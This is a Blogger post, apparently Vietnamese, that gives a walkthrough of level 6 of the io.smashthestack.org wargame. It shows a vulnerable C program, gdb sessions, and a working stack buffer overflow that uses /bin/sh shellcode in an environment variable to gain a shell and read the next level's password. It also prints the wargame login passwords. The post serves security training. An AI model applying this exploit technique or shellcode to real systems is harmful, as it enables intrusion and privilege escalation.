Featured Content Slider

Home » » io.smashthestack.org level6

io.smashthestack.org level6

Vo Uu | 00:07 | 0 nhận xét
ssh level6@io.smashthestack.org
passwd: 9BT8fmYDTPimXXhY3m
level6@io:~$ cd /levels/
level6@io:/levels$ cat level06.c
//written by bla
//inspired by nnp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum{
LANG_ENGLISH,
LANG_FRANCAIS,
LANG_DEUTSCH,
};

int language = LANG_ENGLISH;

struct UserRecord{
        char name[40];
        char password[32];
        int id;
};

void greetuser(struct UserRecord user){
        char greeting[64];
        switch(language){
                case LANG_ENGLISH:
                        strcpy(greeting, "Hi "); break;
                case LANG_FRANCAIS:
                        strcpy(greeting, "Bienvenue "); break;
                case LANG_DEUTSCH:
                        strcpy(greeting, "Willkommen "); break;
        }
        strcat(greeting, user.name);
        printf("%s\n", greeting);
        //Fr.Uni. easter egg
}

int main(int argc, char **argv, char **env){
        if(argc != 3) {
                printf("USAGE: %s [name] [password]\n", argv[0]);
                return 1;
        }

        struct UserRecord user = {0};
        strncpy(user.name, argv[1], sizeof(user.name));
        strncpy(user.password, argv[2], sizeof(user.password));

        char *envlang = getenv("LANG");
        if(envlang)
                if(!memcmp(envlang, "fr", 2))
                        language = LANG_FRANCAIS;
                else if(!memcmp(envlang, "de", 2))
                        language = LANG_DEUTSCH;

        greetuser(user);
}

level6@io:/levels$

level6@io:/levels$ export LANG="de"

level6@io:/levels$ ./level06
USAGE: ./level06 [name] [password]
level6@io:/levels$ ./level06 `python -c 'print "a"*40 + " " + "b"*32'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Segmentation fault


level6@io:/levels$ gdb ./level06
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /levels/level06...(no debugging symbols found)...done.
(gdb) r `python -c 'print "a"*40 + " " + "b"*32'`
Starting program: /levels/level06 `python -c 'print "a"*40 + " " + "b"*32'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

Program received signal SIGSEGV, Segmentation fault.
0x62626262 in ?? ()



level6@io:/levels$ export BINSH=$(python -c 'print "\x90"*10 + "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"';)
level6@io:/levels$ cd /tmp/pns6
level6@io:/tmp/pns6$ ls
getenv  getenv.c
level6@io:/tmp/pns6$ ./getenv
The current path is: 0xbfffff4b
level6@io:/tmp/pns6$ cd /levels/
level6@io:/levels$ gdb ./level06
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /levels/level06...(no debugging symbols found)...done.
(gdb) `python -c 'print "a"*40+ " " + "b"*29+"\x4b\xff\xff\xbf"'`              Undefined command: "".  Try "help".
(gdb) r `python -c 'print "a"*40+ " " + "b"*29+"\x4b\xff\xff\xbf"'`
Starting program: /levels/level06 `python -c 'print "a"*40+ " " + "b"*29+"\x4b\xff\xff\xbf"'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbKÿÿ

Program received signal SIGSEGV, Segmentation fault.
0x62626262 in ?? ()
(gdb) r `python -c 'print "a"*40+ " " + "b"*27+"\x4b\xff\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level06 `python -c 'print "a"*40+ " " + "b"*27+"\x4b\xff\xff\xbf"'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbKÿÿ¿

Program received signal SIGSEGV, Segmentation fault.
0xff4b6262 in ?? ()
(gdb) r `python -c 'print "a"*40+ " " + "b"*25+"\x4b\xff\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /levels/level06 `python -c 'print "a"*40+ " " + "b"*25+"\x4b\xff\xff\xbf"'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbKÿÿ¿
process 2536 is executing new program: /bin/bash
sh-4.2$ quit
sh: quit: command not found
sh-4.2$ exit
exit
[Inferior 1 (process 2536) exited with code 0177]
(gdb) quit
level6@io:/levels$ ./level06 `python -c 'print "a"*40+ " " + "b"*25+"\x4b\xff\xff\xbf"'`
Willkommen aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbKÿÿ¿
sh-4.2$ cat /home/level07/.pass
cat: /home/level07/.pass: No such file or directory
sh-4.2$ cat /home/level7/.pass
u1zqhnHEzaKmzK09Um
sh-4.2$



Share this article :
Người đăng: Vo Uu vào lúc 00:07

0 nhận xét:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)

Recent Post

Test Footer 1

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. The UG - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger